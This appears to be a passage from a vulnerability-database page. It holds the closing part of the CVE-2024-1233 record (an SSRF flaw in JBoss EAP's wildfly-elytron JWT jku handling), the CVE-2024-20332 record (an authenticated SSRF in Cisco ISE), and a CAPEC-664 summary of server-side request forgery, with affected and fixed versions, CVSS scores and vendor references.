{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform_eus:7.3::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-elytron",
"product": "Red Hat JBoss Enterprise Application Platform 7.3 EUS for RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.10.17-1.Final_redhat_00001.1.el7eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-apache-cxf",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:3.5.8-1.redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-hal-console",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:3.3.22-1.Final_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-infinispan",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:11.0.19-2.Final_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-ejb-client",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.0.54-3.Final_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-jsf-api_2.3_spec",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:3.0.0-8.SP08_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-metadata",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:13.5.0-1.Final_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-modules",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.12.3-3.Final_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-server-migration",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.10.0-36.Final_redhat_00035.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-undertow",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.2.32-1.SP1_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:7.4.17-2.GA_redhat_00002.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-discovery",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.2.4-1.Final_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-elytron",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.15.23-2.Final_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-http-client",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.1.17-1.Final_redhat_00002.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-transaction-client",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.1.19-1.Final_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-wss4j",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.4.3-1.redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el8"
],
"defaultStatus": "affected",
"packageName": "eap7-xml-security",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.3.4-1.redhat_00002.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-apache-cxf",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:3.5.8-1.redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-hal-console",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:3.3.22-1.Final_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-infinispan",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:11.0.19-2.Final_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-ejb-client",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.0.54-3.Final_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-jsf-api_2.3_spec",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:3.0.0-8.SP08_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-metadata",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:13.5.0-1.Final_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-modules",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.12.3-3.Final_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-jboss-server-migration",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.10.0-36.Final_redhat_00035.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-undertow",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.2.32-1.SP1_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:7.4.17-2.GA_redhat_00002.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-discovery",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.2.4-1.Final_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-elytron",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.15.23-2.Final_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-http-client",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.1.17-1.Final_redhat_00002.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-transaction-client",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.1.19-1.Final_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-wss4j",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.4.3-1.redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el9"
],
"defaultStatus": "affected",
"packageName": "eap7-xml-security",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.3.4-1.redhat_00002.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:7.4::el7"
],
"defaultStatus": "affected",
"packageName": "eap7-wildfly-elytron",
"product": "Red Hat JBoss Enterprise Application Platform 7.4 on RHEL 7",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:1.15.23-2.Final_redhat_00001.1.el7eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:8.0"
],
"defaultStatus": "unaffected",
"packageName": "eap",
"product": "Red Hat JBoss Enterprise Application Platform 8",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:8.0::el8"
],
"defaultStatus": "affected",
"packageName": "eap8-elytron-web",
"product": "Red Hat JBoss Enterprise Application Platform 8.0 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.0.1-1.Final_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:8.0::el8"
],
"defaultStatus": "affected",
"packageName": "eap8-wildfly-elytron",
"product": "Red Hat JBoss Enterprise Application Platform 8.0 for RHEL 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.2.4-2.SP01_redhat_00001.1.el8eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:8.0::el9"
],
"defaultStatus": "affected",
"packageName": "eap8-elytron-web",
"product": "Red Hat JBoss Enterprise Application Platform 8.0 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.0.1-1.Final_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:jboss_enterprise_application_platform:8.0::el9"
],
"defaultStatus": "affected",
"packageName": "eap8-wildfly-elytron",
"product": "Red Hat JBoss Enterprise Application Platform 8.0 for RHEL 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:2.2.4-2.SP01_redhat_00001.1.el9eap",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/jbossnetwork/restricted/listSoftware.html",
"cpes": [
"cpe:/a:redhat:jbosseapxp"
],
"defaultStatus": "affected",
"packageName": "wildfly",
"product": "Red Hat JBoss Enterprise Application Platform Expansion Pack",
"vendor": "Red Hat"
}
],
"credits": [
{
"lang": "en",
"value": "Red Hat would like to thank Jingcheng Yang and Jianjun Chen from Sichuan University and Zhongguancun Lab for reporting this issue."
}
],
"datePublic": "2024-04-02T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A flaw was found in` JwtValidator.resolvePublicKey` in JBoss EAP, where the validator checks jku and sends a HTTP request. During this process, no whitelisting or other filtering behavior is performed on the destination URL address, which may result in a server-side request forgery (SSRF) vulnerability."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Moderate"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "LOW",
"baseScore": 7.3,
"baseSeverity": "HIGH",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-16T00:00:36.042Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2024:3559",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3559"
},
{
"name": "RHSA-2024:3560",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3560"
},
{
"name": "RHSA-2024:3561",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3561"
},
{
"name": "RHSA-2024:3563",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3563"
},
{
"name": "RHSA-2024:3580",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3580"
},
{
"name": "RHSA-2024:3581",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3581"
},
{
"name": "RHSA-2024:3583",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:3583"
},
{
"name": "RHSA-2025:9582",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2025:9582"
},
{
"name": "RHSA-2025:9583",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2025:9583"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2024-1233"
},
{
"name": "RHBZ#2262849",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2262849"
},
{
"url": "https://github.com/advisories/GHSA-v4mm-q8fv-r2w5"
},
{
"url": "https://github.com/wildfly/wildfly/pull/17812/commits/0c02350bc0d84287bed46e7c32f90b36e50d3523"
},
{
"url": "https://issues.redhat.com/browse/WFLY-19226"
}
],
"timeline": [
{
"lang": "en",
"time": "2024-02-05T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2024-04-02T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Eap: wildfly-elytron has a ssrf security issue",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_redhatCweChain": "CWE-918: Server-Side Request Forgery (SSRF)"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2024-1233",
"datePublished": "2024-04-09T07:01:47.673Z",
"dateReserved": "2024-02-05T18:40:46.701Z",
"dateUpdated": "2025-09-16T00:00:36.042Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-20332 (GCVE-0-2024-20332)
Vulnerability from cvelistv5
Published
2024-04-03 16:22
Modified
2025-08-26 20:08
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-918 - Server-Side Request Forgery (SSRF)
Summary
A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a server-side request forgery (SSRF) attack through an affected device.
This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device. To successfully exploit this vulnerability, the attacker would need valid Super Admin credentials.
References
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Cisco | Cisco Identity Services Engine Software |
Version: 3.2.0 Version: 3.2.0 p1 Version: 3.2.0 p2 Version: 3.2.0 p3 Version: 3.2.0 p4 Version: 3.3.0 |
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2024-20332",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-04-04T15:38:22.318627Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-08-26T20:08:10.020Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-01T21:59:41.923Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "cisco-sa-ise-ssrf-FtSTh5Oz",
"tags": [
"x_transferred"
],
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-ssrf-FtSTh5Oz"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "Cisco Identity Services Engine Software",
"vendor": "Cisco",
"versions": [
{
"status": "affected",
"version": "3.2.0"
},
{
"status": "affected",
"version": "3.2.0 p1"
},
{
"status": "affected",
"version": "3.2.0 p2"
},
{
"status": "affected",
"version": "3.2.0 p3"
},
{
"status": "affected",
"version": "3.2.0 p4"
},
{
"status": "affected",
"version": "3.3.0"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to conduct a server-side request forgery (SSRF) attack through an affected device.\r\n\r This vulnerability is due to improper input validation for specific HTTP requests. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker to send arbitrary network requests that are sourced from the affected device. To successfully exploit this vulnerability, the attacker would need valid Super Admin credentials."
}
],
"exploits": [
{
"lang": "en",
"value": "The Cisco PSIRT is not aware of any public announcements or malicious use of the vulnerability that is described in this advisory."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"format": "cvssV3_1"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-918",
"description": "Server-Side Request Forgery (SSRF)",
"lang": "en",
"type": "cwe"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-04-03T16:22:02.111Z",
"orgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
"shortName": "cisco"
},
"references": [
{
"name": "cisco-sa-ise-ssrf-FtSTh5Oz",
"url": "https://sec.cloudapps.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-ise-ssrf-FtSTh5Oz"
}
],
"source": {
"advisory": "cisco-sa-ise-ssrf-FtSTh5Oz",
"defects": [
"CSCwi11965"
],
"discovery": "EXTERNAL"
}
}
},
"cveMetadata": {
"assignerOrgId": "d1c1063e-7a18-46af-9102-31f8928bc633",
"assignerShortName": "cisco",
"cveId": "CVE-2024-20332",
"datePublished": "2024-04-03T16:22:02.111Z",
"dateReserved": "2023-11-08T15:08:07.641Z",
"dateUpdated": "2025-08-26T20:08:10.020Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
No mitigation information available for this CWE.
CAPEC-664: Server Side Request Forgery
An adversary exploits improper input validation by submitting maliciously crafted input to a target application running on a server, with the goal of forcing the server to make a request either to itself, to web services running in the server’s internal network, or to external third parties. If successful, the adversary’s request will be made with the server’s privilege level, bypassing its authentication controls. This ultimately allows the adversary to access sensitive data, execute commands on the server’s network, and make external requests with the stolen identity of the server. Server Side Request Forgery attacks differ from Cross Site Request Forgery attacks in that they target the server itself, whereas CSRF attacks exploit an insecure user authentication mechanism to perform unauthorized actions on the user's behalf.